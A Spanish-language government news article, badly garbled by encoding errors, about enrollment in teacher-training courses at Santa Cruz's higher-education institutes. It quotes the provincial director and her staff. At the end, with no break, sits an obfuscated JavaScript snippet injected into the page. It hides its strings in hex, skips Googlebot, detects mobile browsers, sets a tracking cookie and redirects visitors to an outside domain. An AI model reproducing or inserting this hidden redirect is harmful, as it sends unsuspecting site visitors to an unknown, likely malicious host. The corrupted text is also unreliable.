Inscripciones abiertas para formarse en EducaciA?n Superior en Santa Cruz

El Gobierno de Santa Cruz, a travAi??s del CPE, informa que se encuentras abiertas las inscripciones a las carreras de formaciA?n pedagA?gica que se dictan en los Institutos Provinciales de EducaciA?n Superior, de gestiA?n pA?blica y privada. La Lic. Patricia Aguirre, directora de EducaciA?n Superior, lleva adelante las polAi??ticas de gestiA?n que apuntan a la formaciA?n de nuevos docentes y al perfeccionamiento de quienes se encuentran en ejercicio.

La Directora Provincial de EducaciA?n Superior, Lic. Patricia Aguirre, en diA?logo con el BoletAi??n de la MaAi??ana (que se emite por Fm Educativa) se explayA? sobre las distintas lAi??neas de gestiA?n que lleva adelante en el A?mbito de su A?rea.

Sobre la oferta acadAi??mica, comentA? que estA?n ai???en la etapa de inscripciA?n para los institutos de formaciA?n, de cualquier manera se va a extender la fecha y en el IPES RAi??o Gallegos el 15 y 16 estA?n las reinscripcionesai???. Y agregA?: ai???Estamos en un proceso inicial importante para todos aquellos que tienen un interAi??s genuino en ser docentes en la Provincia de Santa Cruzai???.

En RAi??o Gallegos funcionan tres institutos, dos de ellos: el Instituto Provincial de EducaciA?n Superior (IPES) RAi??o Gallegos y el Conservatorio Provincial de MA?sica, son instituciones de gestiA?n pA?blica. En el primero, las carreras que se pueden cursar son los Profesorados de EducaciA?n Inicial, de EducaciA?n Primaria, de EducaciA?n Especial con dos modalidades (Discapacidad Intelectual y, Sordos e HipoacA?sicos). Mientras que en el nivel superior del Conservatorio se dictan los Profesorados de MA?sica (con dos orientaciones Guitarra y Piano), y de Artes Visuales.

El tercer instituto pertenece al A?mbito de gestiA?n privada, se trata del ISES donde la oferta incluye el Profesorado de InglAi??s y el de BiologAi??a.

En zona norte, se cuenta con el IPES Caleta Olivia. AllAi?? se puede estudiar los siguientes Profesorados: de EducaciA?n Inicial, de InglAi??s, de Letras, de EducaciA?n Especial con dos orientaciones (Discapacidad Intelectual y, Sordos e HipoacA?sicos). Y por A?ltimo, la extensiA?n A?ulica de Puerto Deseado, donde se imparte el Profesorado de Inicial con una sola cohorte.

El equipo de gestiA?n que acompaAi??a a la Directora Aguirre estA?s conformado por la Prof. Marina GonzA?lez, Secretaria TAi??cnica Administrativa y el Mg. Marcelo Mazza, Secretario TAi??cnico PedagA?gico. Ambos profesionales trabajan en forma conjunta y coordinada los distintos aspectos tAi??cnicos de la direcciA?n.

En cuanto a los objetivos generales, la Licenciada expresA?: ai???Es para nosotros un compromiso sumamente importante el de generar herramientas para mejorar el nivel acadAi??mico de los alumnos y para tambiAi??n mejorar el nivel acadAi??mico de los docentes, a travAi??s de una formaciA?n que permita luego de cuatro aAi??os de estudios comenzar ellos a cambiar la historia tambiAi??nai???.

En este sentido, agregA?, ai???hemos tenido quiebres permanentes y eso no es inocuo en la formaciA?n de un alumno, por lo que es toda una responsabilidad; si bien comenzamos (en la DPES) hace relativamente poco tiempo, no podemos dejar de leer este hecho y trabajar en consecuencia generando una serie de herramientas y dispositivos pedagA?gicos y acadAi??micos que nos permita a nosotros incidir en esta cuestiA?nai???.

Para los docentes

En el nivel de la EducaciA?n Superior, ademA?s de formar a futuros docentes se ofrecen herramientas a quienes ya estA?n trabajando en las aulas.

Sobre el particular, el Mg. Marcelo Mazza explicA? que se proponen diferentes lAi??neas de acciA?n con una planificaciA?n que apunta “hacia el interior, para el fortalecimiento de los equipos tAi??cnicos desde la jurisdicciA?n a travAi??s de estrategias de gestiA?n que sean efectivas dentro la polAi??tica educativa”. Y por otro lado, se busca “gestionar recursos que favorezcan el logro de estos objetivos, y un tema clave para ello es fortalecer las prA?cticas de enseAi??anza de manera sistemA?tica en todas las modalidades”. SubrayA?: ai???La idea es tender a formar nuevos docentes con saberes y capacidades especAi??ficamente para llevar adelante los procesos de enseAi??anza y promover aprendizajes de calidad”.

Asimismo, puntualizA? el Magister que la decisiA?n de brindar espacios de perfeccionamiento y fortalecimiento orientados al logro de la calidad educativa es una consecuencia del “avance de las polAi??ticas educativas, determinadas por diferentes contextos y distintas realidades, hoy se nos exige una formaciA?n docente que visibilice las competencias que no solo ataAi??en al nivel acadAi??mico y formativo, sino tambiAi??n a otro tipo de capacidades como las lingA?Ai??sticas y las que nos permiten la adecuaciA?n en funciA?n al contexto, que nos estA? marcando el A?mbito social en el que nos desarrollamos. Incluso el avance de las nuevas tecnologAi??as hoy nos posiciona de otra maneraai???.

ai???El aprendizaje es permanente, centrado en el alumno por supuesto, pero tambiAi??n desde la formaciA?n docenteai???, mencionA? Mazza y ai???por eso avanzamos desde la DPES en varias propuestas acadAi??micas que acompaAi??en su formaciA?n, algunas orientadas a jerarquizar, potenciar y complementar la formaciA?n de baseai???, y por otro lado, ai???a dar respuesta a aquellos docentes que estA?n insertos en los distintos niveles educativos por competencia de tAi??tuloai???. Para estos A?ltimos, la Provincia adhiere a un dispositivo denominado Trayectos.

En el sitio web trayectospedagogicos.educ.ar se puede acceder a esta posibilidad, en la que la DPES trabaja fuertemente, para que los profesionales que estA?n dictando espacios curriculares, y estAi??n interesados en cursar estos trayectos accedan a completar su formaciA?n en el aspecto pedagA?gico.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}